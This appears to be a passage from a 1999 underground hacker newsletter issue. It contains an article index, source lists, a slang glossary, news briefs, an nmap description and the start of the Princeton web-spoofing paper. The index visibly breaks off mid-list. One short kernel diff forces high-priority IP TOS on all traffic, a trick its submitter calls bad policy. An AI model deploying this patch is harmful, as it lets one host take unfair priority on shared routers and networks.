[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= ========================================================================== = <=-[ HWA.hax0r.news ]-=> = ========================================================================== [=HWA'99=] Number 13 Volume 1 1999 April 1st 99 ========================================================================== [ 61:20:6B:69:64:20:63:6F:75: ] [ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ] [ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ] ========================================================================== On writing 'too technical' in an English assignment .... she said "put it in laymen's terms" i was thinking "you mean lamers' terms??" - *G* 010010 0101010101 01010101 0101010101010 010101 010101 010101 01010101 010101 01010101 010101 010101010 0010101010 01010100101010 0101010101 0101010101010 Note that some stuff may not display correctly as I did not fully convert all the text contained in this file to html, it is recommended you read this file in standard text mode... 4445494c0494C554E4C554E =------------------------------------------------------------------------= =------------------------------------------------------------------------= Synopsis --------- The purpose of this newsletter is to 'digest' current events of interest that affect the online underground and netizens in general. This includes coverage of general security issues, hacks, exploits, underground news and anything else I think is worthy of a look see. (remember i'm doing this for me, not you, the fact some people happen to get a kick/use out of it is of secondary importance). This list is NOT meant as a replacement for, nor to compete with, the likes of publications such as CuD or PHRACK or with news sites such as AntiOnline, the Hacker News Network (HNN) or mailing lists such as BUGTRAQ or ISN nor could any other 'digest' of this type do so. It *is* intended however, to compliment such material and provide a reference to those who follow the culture by keeping tabs on as many sources as possible and providing links to further info, its a labour of love and will be continued for as long as I feel like it, i'm not motivated by dollars or the illusion of fame, did you ever notice how the most famous/infamous hackers are the ones that get caught? there's a lot to be said for remaining just outside the circle... @HWA =-----------------------------------------------------------------------= Welcome to HWA.hax0r.news ... #13 =-----------------------------------------------------------------------= ******************************************************************* *** /join #HWA.hax0r.news on EFnet the key is `zwen' *** *** *** *** please join to discuss or impart news on techno/phac scene *** *** stuff or just to hang out ... someone is usually around 24/7*** *** *** *** Note that the channel isn't there to entertain you its for *** *** you to talk to us and impart news, if you're looking for fun*** *** then do NOT join our channel try #wierdwigs or something... *** *** we're not #chatzone or #hack *** *** *** ******************************************************************* =-------------------------------------------------------------------------= Issue #13 Artificial intelligence is no match for natural stupidity. =--------------------------------------------------------------------------= [ INDEX ] =--------------------------------------------------------------------------= Key Content =--------------------------------------------------------------------------= 00.0 .. COPYRIGHTS ...................................................... 00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC ....................... 00.2 .. SOURCES ......................................................... 00.3 .. THIS IS WHO WE ARE .............................................. 00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?.......................... 00.5 .. THE HWA_FAQ V1.0 ................................................ 01.0 .. GREETS .......................................................... 01.1 .. Last minute stuff, rumours, newsbytes ........................... 01.2 .. Mailbag ......................................................... 02.0 .. From the Editor.................................................. 03.0 .. Why Business Fears Distributed Attacks........................... 04.0 .. April Popular Mechanics article: Hackers and Crackers............ 05.0 .. What IS frame spoofing etc anyways?.............................. 06.0 .. What should I fear from Java and ActiveX?........................ 07.0 .. Some cool geek code (leetbuzz.c) to roll your led's from root.... 08.0 .. Building a packet sniffer from the ground up Part I.............. 09.0 .. CIAC Security advisory on HP-UX ftp,hpterm....................... 10.0 .. Sendmail DoS on versions up to latest 8.9.3...................... 11.0 .. Xylan Omniswitch 'features' (DoS)................................ 12.0 .. xfs (font server for X) bug, exploitability warning.............. 12.1 .. xfsx.sh - Very simple shell script exploit code for the recently discovered xfs security hole. By ArchAng3| of Death, Midgard Security Team. ................................................. 13.0 .. Bug allows remote systems to read local files remotely in MSIE5 14.0 .. Possible root/user level compromise in SCO TermVision............ 15.0 .. Linux INSMOD exploit/vulnerability............................... 16.0 .. Webramp DoSability............................................... 17.0 .. HP Security bulletins (March 31)................................. 18.0 .. VENGINE polymorphic mutation engine for the Melissa virus w/code. 18.1 .. [ISN] Virus camp split over melissa virus........................ 18.2 .. [ISN] The Anarchic Lure of Virus Writing ........................ 18.3 .. A shadowy bunch...Philly Inquirer................................ 18.4 .. National Post "Hang Hackers like Coin Clippers".................. 18.5 .. Second victim, erh suspect fingered on Melissa virus in Europe... 19.0 .. Various vulnerabilities;......................................... 1. Overflow in CAC.Washington.EDU ipop3d 4.xx................... 2. Overflow in pine 4.xx (Linux)................................ 3. Lockfile vunerability in pine 4.xx (Linux)................... 4. Lockfile vunerability in ipop3d 4.xx......................... 5. Linux 2.x IPC vunerability................................... 6. Linux 2.x mmap vunerability.................................. 7. Midnight Commander 4.x bugs (x2)............................. 20.0 .. AOLwatch news.................................................... 21.0 .. AntiOnline and hacker attacks.................................... 22.0 .. NATO fights Serbs online......................................... 23.0 .. Chicago man sues employer over having weak voicemail security.... 24.0 .. Mitnick speaks in a rare Q and A, (Forbes)....................... 25.0 .. Australian stock exchange to carry out threat on Y2K slackers.... 26.0 .. Hack your Palm V to add eight mb of ram!......................... 27.0 .. MDT software mentioned in last issue warrants arrests............ 28.0 .. Hot on the trail of infamous hacker/cracker Zyklon, BUSTED!...... 28.1 .. Rebuttal by Fluxx;.............................................. 29.0 .. Atlanta based ISS looks to hire hackers from OZ.................. 30.0 .. More on hacktivism from the Boston Globe......................... 31.0 .. Some nasty WinGate 3.0 DoS's, password fun and other probs....... 32.0 .. Sekure team releases problems found with ISS-scanner (rewt sploit!) 33.0 .. FileGuard crack, security vulnerabilities........................ 34.0 .. Linux system administration mini-howto by Pestilence ............ 35.0 .. Guide to using NMAP by Lamont Granquist ......................... 36.0 .. Digital Unix 4.0 has potential root compromise in /var perms..... 37.0 .. Running Procmail - Picture postcards - CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250 tapes with hack/security related archives, logs, irc logs etc on em. - audio or video cassettes of yourself/others etc of interesting phone fun or social engineering examples or transcripts thereof. If you still can't think of anything you're probably not that interesting a person after all so don't worry about it Our current email: Submissions/zine gossip.....: hwa@press.usmc.net Private email to editor.....: cruciphux@dok.org Distribution/Website........: sas72@usa.net @HWA 00.2 Sources *** ~~~~~~~~~~~ Sources can be some, all, or none of the following (by no means complete nor listed in any degree of importance) Unless otherwise noted, like msgs from lists or news from other sites, articles and information is compiled and or sourced by Cruciphux no copyright claimed. HiR:Hackers Information Report... http://axon.jccc.net/hir/ News & I/O zine ................. http://www.antionline.com/ Back Orifice/cDc..................http://www.cultdeadcow.com/ News site (HNN) .....,............http://www.hackernews.com/ Help Net Security.................http://net-security.org/ News,Advisories,++ ...............http://www.l0pht.com/ NewsTrolls (HNN)..................http://www.newstrolls.com/ News + Exploit archive ...........http://www.rootshell.com/beta/news.html CuD ..............................http://www.soci.niu.edu/~cudigest News site+........................http://www.zdnet.com/ News site+........................http://www.gammaforce.org/ News site+........................http://www.projectgamma.com/ +Various mailing lists and some newsgroups, such as ... +other sites available on the HNN affiliates page, please see http://www.hackernews.com/affiliates.html as they seem to be popping up rather frequently ... http://www.the-project.org/ .. IRC list/admin archives http://www.anchordesk.com/ .. Jesse Berst's AnchorDesk alt.hackers.malicious alt.hackers alt.2600 BUGTRAQ ISN security mailing list ntbugtraq <+others> NEWS Agencies, News search engines etc: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.cnn.com/SEARCH/ http://www.foxnews.com/search/cgi-bin/search.cgi?query=cracker&days=0&wires=0&startwire=0 http://www.news.com/Searching/Results/1,18,1,00.html?querystr=cracker http://www.ottawacitizen.com/business/ http://search.yahoo.com.sg/search/news_sg?p=cracker http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=cracker http://www.zdnet.com/zdtv/cybercrime/ http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column) NOTE: See appendices for details on other links. http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm http://freespeech.org/eua/ Electronic Underground Affiliation http://www.l0pht.com/cyberul.html http://www.hackernews.com/archive.html?122998.html http://ech0.cjb.net ech0 Security http://net-security.org Net Security ... Submissions/Hints/Tips/Etc ~~~~~~~~~~~~~~~~~~~~~~~~~~ All submissions that are `published' are printed with the credits you provide, if no response is received by a week or two it is assumed that you don't care wether the article/email is to be used in an issue or not and may be used at my discretion. Looking for: Good news sites that are not already listed here OR on the HNN affiliates page at http://www.hackernews.com/affiliates.html Magazines (complete or just the articles) of breaking sekurity or hacker activity in your region, this includes telephone phraud and any other technological use, abuse hole or cool thingy. ;-) cut em out and send it to the drop box. - Ed Mailing List Subscription Info (Far from complete) Feb 1999 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~ ISS Security mailing list faq : http://www.iss.net/iss/maillist.html THE MOST READ: BUGTRAQ - Subscription info ~~~~~~~~~~~~~~~~~~~~~~~~~~~ What is Bugtraq? Bugtraq is a full-disclosure UNIX security mailing list, (see the info file) started by Scott Chasin . To subscribe to bugtraq, send mail to listserv@netspace.org containing the message body subscribe bugtraq. I've been archiving this list on the web since late 1993. It is searchable with glimpse and archived on-the-fly with hypermail. Searchable Hypermail Index; http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html Link About the Bugtraq mailing list ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The following comes from Bugtraq's info file: This list is for *detailed* discussion of UNIX security holes: what they are, how to exploit, and what to do to fix them. This list is not intended to be about cracking systems or exploiting their vulnerabilities. It is about defining, recognizing, and preventing use of security holes and risks. Please refrain from posting one-line messages or messages that do not contain any substance that can relate to this list`s charter. I will allow certain informational posts regarding updates to security tools, documents, etc. But I will not tolerate any unnecessary or nonessential "noise" on this list. Please follow the below guidelines on what kind of information should be posted to the Bugtraq list: + Information on Unix related security holes/backdoors (past and present) + Exploit programs, scripts or detailed processes about the above + Patches, workarounds, fixes + Announcements, advisories or warnings + Ideas, future plans or current works dealing with Unix security + Information material regarding vendor contacts and procedures + Individual experiences in dealing with above vendors or security organizations + Incident advisories or informational reporting Any non-essential replies should not be directed to the list but to the originator of the message. Please do not "CC" the bugtraq reflector address if the response does not meet the above criteria. Remember: YOYOW. You own your own words. This means that you are responsible for the words that you post on this list and that reproduction of those words without your permission in any medium outside the distribution of this list may be challenged by you, the author. For questions or comments, please mail me: chasin@crimelab.com (Scott Chasin) Crypto-Gram ~~~~~~~~~~~ CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses, insights, and commentaries on cryptography and computer security. To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a blank message to crypto-gram-subscribe@chaparraltree.com.  To unsubscribe, visit http://www.counterpane.com/unsubform.html.  Back issues are available on http://www.counterpane.com. CRYPTO-GRAM is written by Bruce Schneier.  Schneier is president of Counterpane Systems, the author of "Applied Cryptography," and an inventor of the Blowfish, Twofish, and Yarrow algorithms.  He served on the board of the International Association for Cryptologic Research, EPIC, and VTW.  He is a frequent writer and lecturer on cryptography. CUD Computer Underground Digest ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This info directly from their latest ish: Computer underground Digest    Sun  14 Feb, 1999   Volume 11 : Issue 09                             ISSN  1004-042X        Editor: Jim Thomas (cudigest@sun.soci.niu.edu)        News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)        Archivist: Brendan Kehoe        Poof Reader:   Etaion Shrdlu, Jr.        Shadow-Archivists: Dan Carosone / Paul Southworth                           Ralph Sims / Jyrki Kuoppala                           Ian Dickinson        Cu Digest Homepage: http://www.soci.niu.edu/~cudigest [ISN] Security list ~~~~~~~~~~~~~~~~~~~ This is a low volume list with lots of informative articles, if I had my way i'd reproduce them ALL here, well almost all .... ;-) - Ed Subscribe: mail majordomo@repsec.com with "subscribe isn". @HWA 00.3 THIS IS WHO WE ARE ~~~~~~~~~~~~~~~~~~ Some HWA members and Legacy staff ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ cruciphux@dok.org.........: currently active/editorial darkshadez@ThePentagon.com: currently active/man in black fprophet@dok.org..........: currently active/IRC+ man in black sas72@usa.net ............. currently active/IRC+ distribution vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black dicentra...(email withheld): IRC+ grrl in black Foreign Correspondants/affiliate members ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ATTENTION: All foreign correspondants please check in or be removed by next issue I need your current emails since contact info was recently lost in a HD mishap and i'm not carrying any deadweight. Plus we need more people sending in info, my apologies for not getting back to you if you sent in January I lost it, please resend. N0Portz ..........................: Australia Qubik ............................: United Kingdom system error .....................: Indonesia Wile (wile coyote) ...............: Japan/the East Ruffneck ........................: Netherlands/Holland And unofficially yet contributing too much to ignore ;) Spikeman .........................: World media Please send in your sites for inclusion here if you haven't already also if you want your emails listed send me a note ... - Ed http://www.genocide2600.com/~spikeman/ .. Spikeman's DoS and protection site http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian) ******************************************************************* *** /join #HWA.hax0r.news on EFnet the key is `zwen' *** ******************************************************************* :-p 1. We do NOT work for the government in any shape or form.Unless you count paying taxes ... in which case we work for the gov't in a BIG WAY. :-/ 2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news events its a good idea to check out issue #1 at least and possibly also the Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ... @HWA 00.4 Whats in a name? why HWA.hax0r.news?? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Well what does HWA stand for? never mind if you ever find out I may have to get those hax0rs from 'Hackers' or the Pretorians after you. In case you couldn't figure it out hax0r is "new skewl" and although it is laughed at, shunned, or even pidgeon holed with those 'dumb leet (l33t?) dewds' this is the state of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you up and comers, i'd highly recommend you get that book. Its almost like buying a clue. Anyway..on with the show .. - Editorial staff @HWA 00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Also released in issue #3. (revised) check that issue for the faq it won't be reprinted unless changed in a big way with the exception of the following excerpt from the FAQ, included to assist first time readers: Some of the stuff related to personal useage and use in this zine are listed below: Some are very useful, others attempt to deny the any possible attempts at eschewing obfuscation by obsucuring their actual definitions. @HWA - see EoA ;-) != - Mathematical notation "is not equal to" or "does not equal" ASC(247) "wavey equals" sign means "almost equal" to. If written an =/= (equals sign with a slash thru it) also means !=, =< is Equal to or less than and => is equal to or greater than (etc, this aint fucking grade school, cripes, don't believe I just typed all that..) AAM - Ask a minor (someone under age of adulthood, usually <16, <18 or <21) AOL - A great deal of people that got ripped off for net access by a huge clueless isp with sekurity that you can drive buses through, we're not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the least they could try leasing one?? *CC - 1 - Credit Card (as in phraud) 2 - .cc is COCOS (Keeling) ISLANDS butthey probably accept cc's CCC - Chaos Computer Club (Germany) *CON - Conference, a place hackers crackers and hax0rs among others go to swap ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk watch videos and seminars, get drunk, listen to speakers, and last but not least, get drunk. *CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker speak he's the guy that breaks into systems and is often (but by no means always) a "script kiddie" see pheer 2 . An edible biscuit usually crappy tasting without a nice dip, I like jalapeno pepper dip or chives sour cream and onion, yum - Ed Ebonics - speaking like a rastafarian or hip dude of colour also wigger Vanilla Ice is a wigger, The Beastie Boys and rappers speak using ebonics, speaking in a dark tongue ... being ereet, see pheer EoC - End of Commentary EoA - End of Article or more commonly @HWA EoF - End of file EoD - End of diatribe (AOL'ers: look it up) FUD - Coined by Unknown and made famous by HNN - "Fear uncertainty and doubt", usually in general media articles not high brow articles such as ours or other HNN affiliates ;) du0d - a small furry animal that scurries over keyboards causing people to type wierd crap on irc, hence when someone says something stupid or off topic 'du0d wtf are you talkin about' may be used. *HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R *HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to define, I think it is best defined as pop culture's view on The Hacker ala movies such as well erhm "Hackers" and The Net etc... usually used by "real" hackers or crackers in a derogatory or slang humorous way, like 'hax0r me some coffee?' or can you hax0r some bread on the way to the table please?' 2 - A tool for cutting sheet metal. HHN - Maybe a bit confusing with HNN but we did spring to life around the same time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper noun means the hackernews site proper. k? k. ;& HNN - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html J00 - "you"(as in j00 are OWN3D du0d) - see 0wn3d MFI/MOI- Missing on/from IRC NFC - Depends on context: No Further Comment or No Fucking Comment NFR - Network Flight Recorder (Do a websearch) see 0wn3d NFW - No fuckin'way *0WN3D - You are cracked and owned by an elite entity see pheer *OFCS - Oh for christ's sakes PHACV - And variations of same Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare Alternates: H - hacking, hacktivist C - Cracking C - Cracking V - Virus W - Warfare A - Anarchy (explosives etc, Jolly Roger's Cookbook etc) P - Phreaking, "telephone hacking" PHone fREAKs ... CT - Cyber Terrorism *PHEER - This is what you do when an ereet or elite person is in your presence see 0wn3d *RTFM - Read the fucking manual - not always applicable since some manuals are pure shit but if the answer you seek is indeed in the manual then you should have RTFM you dumb ass. TBC - To Be Continued also 2bc (usually followed by ellipses...) :^0 TBA - To Be Arranged/To Be Announced also 2ba TFS - Tough fucking shit. *w00t - 1 - Reserved for the uber ereet, noone can say this without severe repercussions from the underground masses. also "w00ten" 2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers) *wtf - what the fuck *ZEN - The state you reach when you *think* you know everything (but really don't) usually shortly after reaching the ZEN like state something will break that you just 'fixed' or tweaked. @HWA -=- :. .: -=- 01.0 Greets!?!?! yeah greets! w0w huh. - Ed ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Thanks to all in the community for their support and interest but i'd like to see more reader input, help me out here, whats good, what sucks etc, not that I guarantee i'll take any notice mind you, but send in your thoughts anyway. * all the people who sent in cool emails and support FProphet Pyra Pasty Drone TwstdPair TheDuece _NeM_ D----Y RTFM99 Kevin Mitnick (watch yer back) ypwitch kimmie vexxation hunchback mack sAs72 Spikeman and the #innerpulse, #hns crew and some inhabitants of #leetchans .... although I use the term 'leet loosely these days, ;) kewl sites: + http://www.l0pht.com/ + http://www.2600.com/ + http://www.genocide2600.com/ + http://www.genocide2600.com/~spikeman/ + http://www.genocide2600.com/~tattooman/ + http://www.hackernews.com/ (Went online same time we started issue 1!) + http://www.net-security.org/ + http://www.slashdot.org/ + http://www.freshmeat.net/ @HWA 01.1 Last minute stuff, rumours and newsbytes ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "What is popular isn't always right, and what is right isn't always popular..." - FProphet '99 +++ When was the last time you backed up your important data? ++ From securitysearch.net We are pleased to inform you that Shake Communications has developed Security Search - an IT security search engine and portal web site. As you would expect, Security Search is free to use, and intended to become the No.1 web site for finding information about IT security. To view Security Search visit http://www.securitysearch.net Please feel free to enter your company or personal and web site details into the search engine. Also, if you wish to advertise on the site at any stage please let us know. Finally, if you have any suggestions or ideas for improvement we would love to hear them. Security Search The Internet Security Search Engine Link ++ contributed to HNN by Seraphic Artifex Swatch is planning to broadcast a series of voice and HTML text messages via an orbiting amateur communications satellite in direct violation of International Telecommunications Union treaty and U.S. FCC regulations. Needless to say HAM Radio enthusiasts are more than a little upset and have started a boycott of Swatch Wired Story Swatch Protest site Nasa Watch HNN ++ contributed to HNN by Code Kid Los Alamos National Laboratory, Sandia National Laboratories in Albuquerque and the Lawrence Livermore National Laboratory in California have all suspended the use of classified systems in an effort to raise security awareness. MSNBC ZD Net HNN ++ nmap v2.12 is out! "nmap is a utility for port scanning large networks, although it works fine for single hosts. The guiding philosophy for the creation of nmap was TMTOWTDI (There's More Than One Way To Do It). This is the Perl slogan, but it is equally applicable to scanners. Sometimes you need speed, other times you may need stealth. In some cases, bypassing firewalls may be required. Not to mention the fact that you may want to scan different protocols (UDP, TCP, ICMP, etc.). You just can't do all this with one scanning mode. And you don't want to have 10 different scanners around, all with different interfaces and capabilities. Thus I [Fyodor] incorporated virtually every scanning technique I [Fyodor] know into nmap. Specifically, nmap supports: Vanilla TCP connect() scanning, TCP SYN (half open) scanning, TCP FIN, Xmas, or NULL (stealth) scanning, TCP ftp proxy (bounce attack) scanning, SYN/FIN scanning using IP fragments (bypasses packet filters), UDP raw ICMP port unreachable scanning, ICMP scanning (ping-sweep), TCP Ping scanning, Remote OS Identification by TCP/IP Fingerprinting, and Reverse-ident scanning. nmap also supports a number of performance and reliability features such as dynamic delay time calculations, packet timeout and retransmission, parallel port scanning, detection of down hosts via parallel pings. Nmap also offers flexible target and port specification, decoy scanning, determination of TCP sequence predictability characteristics, and output to machine parseable or human readable log files." -- Fyodor. Changes: -sT now uses a different method to determine the results of a non-blocking connect() call (makes nmap more portable), got rid of the security warning message for people who are missing /dev/random and /dev/urandom due to complaints about the warning (note: This only silences the warnings -- it still uses relatively weak random number generation under Solaris and other systems that lack this functionality), eliminated pow() calls on Linux boxes to rectify a SIGSEGV condition, fixed an rpm problem. 322k. By Fyodor. http://www.insecure.org/nmap/ nmap ++ This patch sets the tos field for IP headers to high priority and optimizes the IP connection for throughput, which has real effects on cisco routers. Since it is bad policy and if hundrets of lamers use it I wont like it. But I even more dislike hidden information, I'll let you decide wether to publish it, but if you decide to do it, please do it anonymously. Thanks. --- linux/net/ipv4/af_inet.c Thu Mar 25 18:23:34 1999 +++ linux/net/ipv4/af_inet.c Thu Mar 25 18:23:35 1999 @@ -408,6 +408,7 @@ sk->timer.function = &net_timer; sk->ip_ttl=ip_statistics.IpDefaultTTL; + sk->ip_tos=IPTOS_PREC_INTERNETCONTROL + IPTOS_THROUGHPUT; sk->ip_mc_loop=1; sk->ip_mc_ttl=1; -- name withheld at request of submitter (from PacketStorm) http://www.genocide2600.com/~tattooman/new.shtml New files ++ sMonitor Version 1.03 for Windows 95/98/NT Copyright © 1998-1999 by Alexander Yarovy Description The program can be used to monitor Internet hosts and services running on them continuously. It allows to create a list of Internet servers and a task lists for each of them: pings and services to check: HTTP, FTP, Telnet, SMTP, POP3, NNTP and any others. The complete list of services and TCP ports according to RFC 1700 is included. http://members.xoom.com/ayarovy/index.html Link ++ Melissa virus creator cans his lawyer Story ++ KeyPost to close Australia Post is set to close down its KeyPost digital certificate issuing authority, citing poor returns and a lower than expected takeup. The closure is expected to take effect on August 1. KeyPost was Australia's first commercial digital certificate authority (CA). It kicked off operations in Victoria nearly two years ago, followed by a nationwide rollout six months later. An Australia Post spokes person told Newswire this afternoon that ditching KeyPost was a commercial decision. "The takeup was lower than expected, and we had anticipated greater interest from all areas of government," the spokesperson said. http://newswire.com.au/9904/kp.htm Story link ++ Melissa man out on bail David Smith, the man arrested for allegedly creating and spreading the Melissa virus, will plead not guilty to a string of offences. According to CNet reports, the 30-year-old New Jersey man told his lawyers from Benedict & Altman that he would plead innocent to charges of interrupting public communication, conspiracy to commit the offence, theft of computer service, and wrongful access to computer systems. Smith has since been released on $US100,000 ($A158,300) bail. http://newswire.com.au/9904/ngmel.htm Story link ++ Victorians step forward for IT&T awards Nominations have opened for the 1999 Asia-Pacific IT&T Awards, which recognise the innovative use of information technology and telecommunications, as well as the outstanding achievements of individuals, organisations and corporations. In Victoria, CD-ROM creator Kylie Robertson and financial calculator maker Mainstream Computing have announced their running. http://newswire.com.au/9904/nom.htm Story link Mucho thanks to Spikeman for directing his efforts to our cause of bringing you the news we want to read about in a timely manner ... - Ed @HWA 01.2 MAILBAG - email and posts from the message board worthy of a read ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Yes we really do get a pile of mail in case you were wondering ;-0 heres a sampling of some of the mail we get here, the more interesting ones are included and of course we had to get in the plugs for the zine coz we love to receive those too *G* - Ed ================================================================ @HWA 02.0 From the editor. ~~~~~~~~~~~~~~~~ #include #include #include main() { printf ("Read commented source!\n\n"); /* *Well this is issue #13, included with the zip file version of this *issue is an excellent reference on port numbers, it is included in *a seperate file as that file alone is nearly 289k. anyway some *interesting tidbits in this issue, enjoy ... * * - Ed * * */ printf ("EoF.\n"); } Congrats, thanks, articles, news submissions and kudos to us at the main address: hwa@press.usmc.net complaints and all nastygrams and mailbombs can go to /dev/nul nukes, synfloods and papasmurfs to 127.0.0.1, private mail to cruciphux@dok.org danke. C*:. @HWA 03.0 Why Business Fears Distributed Attacks ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From buffer overflow (HNN) http://www.hackernews.com/orig/fear.html By: B. Houston For years, in the security industry, analysts have been spreading the anxiety of massive distributed attacks against sites. They have described to clients the possiblity of a similtaneous, parallel system attack pulled off with military like precision. To many, it looks like that day has actually arrived. During the recent attacks on the Pentagon, many people in the media were eluding to everything from third-world military and terrorist organizations to a single "script kiddie" playing with some new toys. The real truth, however, is that all these things may be the case, or none of them. In the Pentagon incident we have press releases, media gossip and tons of hype but the one thing we don't have is the truth. Out of the whole scenario, the only things we know for sure are that there will be more fear and more attacks. The problems demonstrated by the distributed attack scenario are many. First, you have the basic concept of a large group of system crackers attacking one system with many resources, an immense amount of bandwidth and a cooperative mind. System administrators, and their corporate bosses, already fear break-in's so a chance of a massive scale penetration is a natural sleep thief for them. Secondly, many administrators feel that they may be able to defend their systems against a lone attacker, but few believe that they could defeat an entire legion of system attacks across a broad band of hosts. Many feel that their current firewalls, intrusion detection systems and logging tools will be less effective against logically grouped attacks existing just under the delicate thereshold that these systems monitor. In addition, you have the extended probability that a high visibility attack may simply be the smokescreen or time-wasting bait used to cover a more dangerous and thorough attack elsewhere on the network. Lastly, and certainly not least, security adminsitrators are alarmed at the growing availability and granularity of the underground knowledgebase available on the Internet. New exploits are being discovered, coded, quantified, explained and canonized on web sites around the world at an alarming pace. System administrators have begun to report an increase in advanced probes, port scans and specific vulnerability tests from the Internet. New tools available in the underground, and the increase of both raw computing power and low level operating systems have made this situation even more apparent. More and more underground users have made the switch to Linux and other free Unix based OS derivatives creating a more technical and programming savvy band of hackers. Or at least that is what many security experts are claiming. On the other hand these same new tools and bandwidth excesses make deception by the underground even easier than a massive attack. Many of the new tools are capable of using address spoofing, parallel scanning and other technologies that make even a simple port scan appear to be a "massive ditributed attack". Sites are being recorded and published that offer access for attack pass-throughs and these are growing in number everyday as new users expand home networks into Internet space via cable modems and ADSL. And yes, the membersof the underground have taken notice. The bottom line is that business and other organizations do indeed need to fear massive distributed penetration attempts. These types of attacks are certainly become more possible and perhaps even probable, though a paniced reaction certainly needs to be avoided at all costs. As always, things may not appear to be as they are. The key here is to read, study and become familiar with the tools and protections available to you. And yes, a few tests are probably in order... @HWA 04.0 Hackers and Crackers ~~~~~~~~~~~~~~~~~~~~ From corporations to universities, computer hackers are still making trouble - and making the law. By Kim Komando Article at http://popularmechanics.com/popmech/crnt/1HOMECRNT.html (N.B: to be web posted 2nd week in April. If it appears in time for next issue it will appear here.) @HWA 05.0 What IS frame spoofing etc anyways? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ I've had several requests for info as to what exactly frame spoofing is so here' is what I learned back from around 1997 when it first became common/mainstream knowledge, hopefully it will clear things up a bit, - Ed Edward W. Felten, Dirk Balfanz, Drew Dean, and Dan S. Wallach Technical Report 540-96 Department of Computer Science, Princeton University Graphics by Markus Hübner (omitted, obviously) Introduction This paper describes an Internet security attack that could endanger the privacy of World Wide Web users and the integrity of their data. The attack can be carried out on today's systems, endangering users of the most common Web browsers, including Netscape Navigator and Microsoft Internet Explorer. Web spoofing allows an attacker to create a "shadow copy" of the entire World Wide Web. Accesses to the shadow Web are funneled through the attacker's machine, allowing the attacker to monitor the all of the victim's activities including any passwords or account numbers the victim enters. The attacker can also cause false or misleading data to be sent to Web servers in the victim's name, or to the victim in the name of any Web server. In short, the attacker observes and controls everything the victim does on the Web. We have implemented a demonstration version of this attack. Spoofing Attacks In a spoofing attack, the attacker creates misleading context in order to trick the victim into making an inappropriate security-relevant decision. A spoofing attack is like a con game: the attacker sets up a false but convincing world around the victim. The victim does something that would be appropriate if the false world were real. Unfortunately, activities that seem reasonable in the false world may have disastrous effects in the real world. Spoofing attacks are possible in the physical world as well as the electronic one. For example, there have been several incidents in which criminals set up bogus automated-teller machines, typically in the public areas of shopping malls [1]. The machines would accept ATM cards and ask the person to enter their PIN code. Once the machine had the victim's PIN, it could either eat the card or "malfunction" and return the card. In either case, the criminals had enough information to copy the victim's card and use the duplicate. In these attacks, people were fooled by the context they saw: the location of the machines, their size and weight, the way they were decorated, and the appearance of their electronic displays. People using computer systems often make security-relevant decisions based on contextual cues they see. For example, you might decide to type in your bank account number because you believe you are visiting your bank's Web page. This belief might arise because the page has a familiar look, because the bank's URL appears in the browser's location line, or for some other reason. To appreciate the range and severity of possible spoofing attacks, we must look more deeply into two parts of the definition of spoofing: security-relevant decisions and context. Security-relevant Decisions By "security-relevant decision," we mean any decision a person makes that might lead to undesirable results such as a breach of privacy or unauthorized tampering with data. Deciding to divulge sensitive information, for example by typing in a password or account number, is one example of a security-relevant decision. Choosing to accept a downloaded document is a security-relevant decision, since in many cases a downloaded document is capable of containing malicious elements that harm the person receiving the document [2]. Even the decision to accept the accuracy of information displayed by your computer can be security-relevant. For example, if you decide to buy a stock based on information you get from an online stock ticker, you are trusting that the information provided by the ticker is correct. If somebody could present you with incorrect stock prices, they might cause you to engage in a transaction that you would not have otherwise made, and this could cost you money. Context A browser presents many types of context that users might rely on to make decisions. The text and pictures on a Web page might give some 